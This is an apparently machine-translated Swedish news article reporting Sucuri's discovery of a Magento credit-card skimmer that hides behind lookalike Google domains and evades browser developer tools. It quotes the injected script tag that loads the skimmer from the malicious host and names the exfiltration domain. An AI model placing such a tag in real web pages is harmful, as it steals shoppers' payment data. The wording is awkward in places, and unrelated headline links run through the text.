Skadliga “Google” – domäner som används i Magento kort skimmer attacker

0
151

Googles Byteboard syftar till att ta smärtan av att anställa för chefer – och kandidater
Den experimentella verktyg är tänkt att hjälpa till att hitta en ny programmerare som lite enklare.

Hot aktörer använder falska, men övertygande Google-domäner för att lura besökare att tro infekterade webbplatser är säker när du gör transaktioner på nätet.

På torsdag, forskare från Sucuri sa nyligen i ett fall rapporteras av en Magento webbplats ägare, en domän hade varit infekterade med ett kreditkort skimmer att använda sig av JavaScript-kod som innehåller en länk till skadlig internationaliserad google-analytîcs[.]kom webbadress.

Ett exempel på koden nedan:

< script type=” text/javascript ” src =” //google-analytîcs.com/www.[censurerat].com/3f5cf4657d5d9.js ” > < /script>

“Besökare på webbplatsen kan se ett välrenommerat namn (som “Google”) i ansökningar och anta att de är säkra att ladda, utan att märka att domänen är inte en perfekt match och är faktiskt skadlig i naturen,” forskarna säger.

TechRepublic: 60% av företagen upplevde insider-attacker under det senaste året

Webbplatsen ägaren var medvetna om ett problem efter att bli svartlistad. Sucuri undersökning visar data capture del av kortet skimmer liknar andra i naturen och använder Javascript för att dolt vattenlås och lagra indata samt drop-down-menyn val.

Men koden kommer att ändra taktik beroende på om utvecklare verktyg i antingen Google Chrome eller Mozilla Firefox webbläsare som används. Skimmer kommer inte att försöka ta tag i någon information på dessa scenarier, som är sannolikt ett försök att undvika upptäckt.

CNET: Ryssland riktade val-system i alla 50 stater, Senatens rapport säger

Kortet skimmer stöder “massor” av betalning gateways, Sucuri säger, och om verktyg för utvecklare inte kan påvisas, stulna informationen skickas till en fjärransluten server-återigen förklädd med en annan bedräglig domän, google[.]ssl[.]lnfo[.]kn.

Se även: USA AG Barr krav tech företag bryta kryptering, “det kan och måste göras”

Kort fiskknivar, installeras via utsatta e-handel webbplatser, är en utbredd företeelse. I juli, RiskIQ sade en nyligen “spray-and-pray” – kampanj visat sig vara framgångsrik för Magecart hacka gruppen, som hade lyckats infektera över 17.000 webbplatser med kort-skimming malware på bara några månader.

Magento användare, på samma sätt som WordPress och Drupal, är alltid rekommenderas att hålla sin mjukvara bygger upp-to-date. Magento domäner finns ett gemensamt mål om att cyberattackers söker att skörda finansiella uppgifter, med uppskattningsvis 83 procent av Magento webbplatser redovisas som utsatta för fiskknivar 2018.

ZDNet har nått ut till Google och kommer att uppdatera om vi hör av sig igen.

Tidigare och relaterade täckning

Google rensar ut stalker, spionprogram appar från Play Store
Över 23 miljoner stulna kreditkort handlas på Mörka Webben
STORBRITANNIEN, EU: s polis-pilotprojekt för att ge egensinnig tonåring hackare vita hattar

Har ett tips? Komma i kontakt säkert via WhatsApp | Signal på +447713 025 499, eller över på Keybase: charlie0

Relaterade Ämnen:

Säkerhet-TV

Hantering Av Data

CXO

Datacenter